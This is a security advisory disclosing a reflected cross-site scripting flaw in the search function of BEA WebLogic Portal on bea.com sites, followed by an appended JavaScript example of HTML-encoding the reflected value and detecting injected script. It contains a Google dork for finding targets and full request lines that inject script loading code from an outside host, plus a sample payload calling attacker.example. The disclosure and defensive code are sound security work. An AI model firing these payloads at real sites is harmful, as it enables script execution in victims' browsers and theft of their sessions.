High cross-site scripting vulnerability in Oracle BEA WebLogic Portal allows remote script execution.
+============================================================================================+
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +
+============================================================================================+
Author(s): Ivan Sanchez
Product:
---------
BEA Systems Inc
http://www.bea.com
Oracle Corporation BEA WebLogic Portal (and others)
Nullcode has reported a vulnerability in BEA WebLogic Portal domains,
which can be exploited by malicious people to conduct high cross-site scripting attacks.
Input passed to the "q" parameter in the function "search_g4.js" isn't properly sanitised.
This can be exploited to execute arbitrary remote script in a user's browser.
The vulnerability has been reported in all *.bea.com domains; all sites use the same function "to search some things".
So other versions and other BEA products may also be affected.
Google Dork:
-----------
site:bea.com/
You can see hundreds of sites.
Function vulnerable:
--------------------
GET http://www.bea.com/content/search/search_g4.js HTTP/1.1
search_g4.js
In the search text box, insert for example: "><script src=http://site/evil-remote-code.js></script>
Within seconds...
Then redirect to other BEA application:
---------------------------------------
Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>
GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1 => HTTP/1.1 200 OK[1.922 s]
Within seconds... simply exploited.
Extracted internal code:
1-
<form action="http://seeker.bea.com/search" method="get" class="formspace"><div class="searchSpacer3"> <label for="search"></label><input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';"><input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0" onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'" style="vertical-align:bottom;">
2-
You can see the query strings in the URL.
Solution:
---------
Edit the source code to ensure that input is properly sanitised.
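The advisory describes the search page reflecting the "q" parameter into the markup without encoding, and the solution is to sanitise that reflection. The following is an added example, not code from the advisory or from BEA's search_g4.js: it shows the unsafe attribute-context reflection beside a hardened version that HTML-encodes the value, plus a small check a defender can run over rendered output. The function names, the hostname and the payload string are constructed for the example.

```javascript
// Added example (not from the advisory or BEA). The search page echoes the "q"
// query-string value into an <input value="..."> attribute. Raw interpolation lets
// a value containing '">' close the attribute and inject markup; HTML-encoding the
// reflected value before insertion prevents that.

// Minimal HTML encoder covering the characters that break out of text and
// attribute contexts.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Extract a query-string parameter the way a server would receive it (URL-decoded).
function getQueryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Unsafe rendering: the pattern the advisory reports (value placed into the
// attribute without encoding).
function renderSearchBoxUnsafe(q) {
  return '<input type="text" name="q" id="search" value="' + q + '">';
}

// Hardened rendering: the reflected value is encoded for the attribute context.
function renderSearchBoxSafe(q) {
  return '<input type="text" name="q" id="search" value="' + escapeHtml(q) + '">';
}

// Defender's check: the template itself never emits a <script> tag, so one in
// the rendered output means user input broke out of the attribute.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample request: hostname and script URL are placeholders.
const SAMPLE_PAYLOAD = '"><script src=http://attacker.example/evil.js></script>';
const SAMPLE_URL =
  'https://search.example.test/search?q=' + encodeURIComponent(SAMPLE_PAYLOAD);

// Demonstration: compare both renderings for the same request.
function demo() {
  const q = getQueryParam(SAMPLE_URL, 'q');
  return {
    unsafeInjected: containsInjectedScript(renderSearchBoxUnsafe(q)),
    safeInjected: containsInjectedScript(renderSearchBoxSafe(q)),
    safeMarkup: renderSearchBoxSafe(q),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The encoder is applied at the point of output, in the context the value lands in (here a double-quoted attribute); sanitising only on input would still leave other reflection points exposed.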
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+============================================================================================+